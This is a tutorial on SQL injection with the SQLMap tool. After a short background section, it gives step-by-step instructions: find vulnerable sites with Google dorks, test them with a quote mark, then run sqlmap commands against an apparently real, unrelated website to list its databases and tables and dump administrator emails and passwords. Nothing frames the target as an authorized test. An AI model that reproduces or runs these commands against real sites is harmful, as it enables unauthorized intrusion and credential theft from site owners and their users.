Introduction To SQL Injection
SQL injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).SQL injection must exploit a security vulnerability in an application’s software. For example, when user input is either incorrectly filtered for string literalescape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites. But can be used to attack any type of SQL database.
SQL injection attacks allow attackers to spoof identity, tamper with existing data. It can cause repudiation issues such as voiding transactions or changing balances. It can allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
What is SQLMap
SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Step 1: Find a website which can be Vulnerable
We will use Google Dork string to find Vulnerable website which can be SQLMAP SQL injectable.
We will use Google Dork Syntax given below.
Then Google will show us all sites with our dork in their url. They will look like this.
“ http://www.tunesoman.com/product.php?id=200 “
Now we will check weather the website is vulnerable or not by adding single quotation mark ‘ at the end of the URL
If the page returns an SQL error, the page is vulnerable to SQL injection. See the example of sql error in below
Step 2: Now Open SQLMAP
Open SQLMAP in the terminal. If you want to see more information about SQLMAP then type “sqlmap — help”. It will give you all the options which are used while performing SQLMAP. let’s see the screenshot below
To find the databases behind the web site, we need to type the following command in the terminal:-
sqlmap –u the enire URL of the vulnerable web page — dbs
In our case:-
sqlmap –u http://www.tunesoman.com/product.php?id=200 — dbs
-u option is used for url
–dbs is used to enumerate DBMS databases
When we run this command on our target url we get the results shown below.
Now see I have highlighted the two available databases, information_schema and db363851433. Information schema is included in every MySQL installation. It includes information on all the objects in the MySQL instances, But it does not contains any data valuable for us. Although it can be beneficial to explore those databases to find objects in all the databases in the instance. We will focus our attention on the database here, db363851433 that may have some valuable information. Let’s explore it further.We can retrieve all the tables which are present in database db363851433 by using following command
sqlmap –u http://www.tunesoman.com/product.php?id=200 –D db363851433 –tables
Now I want to find more information about admin_user table then type the following command
Now I want to gain more information about admin_user table then type the following command
sqlmap –u http://www.tunesoman.com/product.php?id=200 –D db363851433 –T admin_user –columns
The above command will give us list of all the columns avalible in admin_user table.
Now I want to find the attribute values such as “ admin_email , admin_pass ” present in the table “ admin_user “
Then I will type the following command:-
sqlmap –u http://www.tunesoman.com/product.php?id=200 –D db363851433 –T admin_user –C admin_email,admin_pass –dump
Now it will show us all the entries in the columns we provided.
In this way we can hack the database in very simple way.